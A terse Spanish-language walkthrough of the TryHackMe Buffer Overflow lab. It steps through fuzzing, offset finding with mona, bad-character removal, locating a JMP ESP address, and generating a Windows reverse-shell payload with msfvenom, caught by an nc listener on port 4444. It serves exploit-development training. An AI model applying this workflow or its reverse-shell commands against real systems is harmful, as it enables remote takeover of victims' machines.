TryHackMe Buffer Overflow3

TryHackMe Buffer Overflow3


Linux

ssh_command.)

python3 fuzzer.py

ssh_command.)

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 1100

ssh_command.)

Copiamos esto a payload en el exploit.py

Reiniciamos app

python3 exploit.py

!mona findmsp -distance 1700

ssh_command.)

Offset es 1274

Ahora cambiamos el offset en el archivo de exploit.py al numero offset Y tambien rtn le ponemos un valor de “BBBB”

ssh_command.)

!mona bytearray -b “\x00”

ssh_command.)

python3 bad_characters.py

Lo que sale del comando arriba lo ponemos en payload

ssh_command.)

!mona compare -f C:\mona\oscp\bytearray.bin -a

ssh_command.)

Los bad chars son los siguientes:

00 11 12 40 41 5f 60 b8 b9 ee ef

Donde dice ESP le damos click derecho y Follow in Dump

ssh_command.)

Quitamos el 11 del payload en el script

ssh_command.)

Reiniciamos app

python3 exploit.py

Donde dice ESP le damos click derecho y Follow in Dump

ssh_command.)

Ahora bad chars son Ahora los bad chars serian \x00\x11\x40

Quitamos el x40 del payload en el script

ssh_command.)

Reiniciamos app

python3 exploit.py

Donde dice ESP le damos click derecho y Follow in Dump

ssh_command.)

Ahora bad chars son Ahora los bad chars serian \x00\x11\x40\x5f

Quitamos el x5f del payload en el script

ssh_command.)

Reiniciamos app

python3 exploit.py

Donde dice ESP le damos click derecho y Follow in Dump

ssh_command.)

Ahora bad chars son Ahora los bad chars serian \x00\x11\x40\x5f\xb8

ssh_command.)

Quitamos el xb8 del payload en el script

ssh_command.)

Reiniciamos app

python3 exploit.py

Donde dice ESP le damos click derecho y Follow in Dump

ssh_command.)

Ahora bad chars son Ahora los bad chars serian \x00\x11\x40\x5f\xb8\xee

ssh_command.)

Quitamos el xee del payload en el script

ssh_command.)

Reiniciamos app

python3 exploit.py

Donde dice ESP le damos click derecho y Follow in Dump

ssh_command.)

Ahora bad chars son Ahora los bad chars serian \x00\x11\x40\x5f\xb8\xee

!mona jmp -r esp -cpb “\x00\x11\x40\x5f\xb8\xee”

ssh_command.)

Agarramos el numero 62501203

cambiamos el rtn y iniciamos payload=” esto en exploit.py

ssh_command.)

msfvenom -p windows/shell_reverse_tcp LHOST=KALI_IP LPORT=4444 EXITFUNC=thread -b “\x00\x11\x40\x5f\xb8\xee” -f c

Agregamos a lo que sale en el comando anterior y ese valor es de payload en el exploit.py

padding = “\x90” * 16 nc -lvnp 4444

ssh_command.)

© 2025 Cu3rv0x